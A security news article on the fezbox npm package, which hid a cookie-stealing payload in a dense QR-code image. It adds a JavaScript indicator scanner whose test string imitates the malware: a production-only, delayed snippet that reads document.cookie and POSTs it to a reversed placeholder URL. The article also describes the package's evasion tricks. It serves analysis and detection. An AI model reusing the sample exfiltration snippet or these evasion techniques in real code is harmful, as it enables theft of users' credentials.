Malicious npm Package Used QR Codes to Deliver Cookie-Stealing Malware

Researchers have uncovered a malicious npm package named fezbox that steals victims’ cookies by downloading an obfuscated payload hidden inside a dense QR code.

Researchers at Socket say the attackers used a QR code as a covert delivery channel. The package fetches a JPG that holds a high-density QR code, decodes the image, and executes the obfuscated payload it contains as the attack's second stage, a design intended to keep the malicious code out of the published package files where scanners would look for it.

By the time npm administrators removed the package, it had been downloaded at least 327 times.

Where the payload lives and how it hides

BleepingComputer reports that the primary malicious code sits in dist/fezbox.cjs (version 1.3.0 is the one cited). The file is minified, but it becomes readable once formatted. The attackers add runtime checks that abort outside a production environment, which helps the code evade sandboxes and automated analysis.

Socket's researchers explain: "Attackers don't want to risk being caught in a virtual or any non-production environment, so they add restrictions on when and how their exploit runs." If the checks pass, the package waits 120 seconds, long enough to outlast the execution window of many automated sandboxes, then parses and executes the code decoded from the QR image. The URL stored in the code is written backwards, a simple obfuscation trick that keeps the literal http:// or https:// prefix away from naive string searches and static scanners.

An unusual, high-density QR code

This QR code is far denser than the ones most people scan with a phone. Instead of a short URL or contact card it carries an entire obfuscated script, and ordinary phone cameras cannot read it. The attackers crafted the image specifically so that the decoder bundled in the package can recover the payload from it.

What the malware does

Once decoded and executed, the obfuscated payload reads cookies via document.cookie (a browser-only API, so the payload fires in web pages that bundle the library rather than in a Node process). Researchers found that it hunts for credentials using the same reversal trick as the URL: field names are stored backwards, for example 'drowssap', and reversed to 'password' at runtime. If the cookie contains both username and password fields, the malware sends the data via an HTTPS POST to:
https://my-nest-app-production[.]up[.]railway[.]app/users (defanged as reported).

If the required fields aren’t present, the code terminates quietly.
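The obfuscation tricks described above (the backwards URL, the backwards field names, the two-minute delay, the document.cookie read and the production-only gate) are cheap to undo and cheap to flag. The following is an added example, not code from the fezbox package or from Socket's research: a small static scanner in JavaScript that searches a bundle for exactly those indicators. The minified snippet it scans is constructed to imitate the reported patterns, and the endpoint example.invalid in it is a placeholder, not the real exfiltration URL.

```javascript
// Added example (not fezbox's code, not Socket's tooling): a static scanner
// that flags the obfuscation tricks the article describes in a JavaScript
// source file. The sample below is CONSTRUCTED to imitate those tricks; the
// URL example.invalid is a placeholder, not the real exfiltration endpoint.
const SAMPLE_MINIFIED = `
const e=process.env.NODE_ENV;if(e!=="production")process.exit(0);
setTimeout(()=>{const u="sresu/dilavni.elpmaxe//:sptth".split("").reverse().join("");
const c=document.cookie;const f=x=>c.includes(x.split("").reverse().join(""));
if(f("emanresu")&&f("drowssap"))fetch(u,{method:"POST",body:c});},120000);
`;

// A benign snippet with a plain URL, for comparison: it should yield no findings.
const SAMPLE_CLEAN = `fetch("https://example.invalid/api", {method: "GET"});`;

// Cookie/credential field names that attackers hide by writing them backwards.
const SENSITIVE_FIELDS = ["username", "password", "token", "session"];

// Sandboxes typically give a sample far less than a minute; a library that
// waits at least this long before acting is suspicious.
const LONG_DELAY_MS = 60000;

function reverseString(s) {
  return s.split("").reverse().join("");
}

// Pull out single- and double-quoted string literals (good enough for minified
// bundles; backtick templates are left to a real parser).
function findStringLiterals(src) {
  const re = /(["'])((?:\\.|(?!\1)[^\\\n])*)\1/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[2]);
  return out;
}

// Returns an array of { kind, value } findings for the indicators described in
// the article: reversed URLs, reversed field names, string-reversal helpers,
// long setTimeout delays, document.cookie reads and NODE_ENV gating.
function scanForIndicators(src) {
  const findings = [];

  for (const lit of findStringLiterals(src)) {
    // "https://" reversed is "//:sptth", "http://" reversed is "//:ptth".
    if (/\/\/:s?ptth/.test(lit)) {
      findings.push({ kind: "reversed-url", value: reverseString(lit) });
    }
    const rev = reverseString(lit);
    if (SENSITIVE_FIELDS.includes(rev)) {
      findings.push({ kind: "reversed-field", value: rev });
    }
  }

  if (/\.split\(\s*(["'])\1\s*\)\s*\.reverse\(\s*\)\s*\.join\(\s*(["'])\2\s*\)/.test(src)) {
    findings.push({ kind: "string-reversal", value: "split('').reverse().join('')" });
  }

  // Heuristic: a numeric literal as the last argument of a call, e.g. "}, 120000)".
  if (/\bsetTimeout\b/.test(src)) {
    const delayRe = /,\s*(\d+)\s*\)/g;
    let m;
    while ((m = delayRe.exec(src)) !== null) {
      const ms = Number(m[1]);
      if (ms >= LONG_DELAY_MS) findings.push({ kind: "long-delay", value: ms });
    }
  }

  if (/document\s*\.\s*cookie/.test(src)) {
    findings.push({ kind: "cookie-read", value: "document.cookie" });
  }

  // NODE_ENV compared against "production" within a short distance.
  if (/NODE_ENV[\s\S]{0,40}["']production["']/.test(src)) {
    findings.push({ kind: "env-gating", value: "NODE_ENV !== production" });
  }

  return findings;
}

// Convenience: the distinct indicator kinds present, sorted, for quick triage.
function indicatorKinds(src) {
  return [...new Set(scanForIndicators(src).map((f) => f.kind))].sort();
}

console.log(scanForIndicators(SAMPLE_MINIFIED));
console.log(indicatorKinds(SAMPLE_CLEAN)); // []
```

Each indicator on its own is weak (plenty of legitimate code reverses strings or reads document.cookie); the point is that the combination in one file, with the decoded URL shown in clear, is what an analyst wants to see when triaging a dependency. Run it over dist/*.cjs of a suspect package after formatting, and treat any reversed-url hit as worth a manual look.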

Why this matters

This campaign shows a novel way of abusing images for covert payload delivery and data exfiltration. An infected machine fetches a seemingly innocuous image, which looks like ordinary image traffic to proxies and network tools, while the QR code inside it carries the executable second stage. Network-level detection is therefore hard; the signal is in the package itself, which is a library with no business fetching a remote image, decoding it, and evaluating the result, let alone doing so only in production and only after a two-minute delay.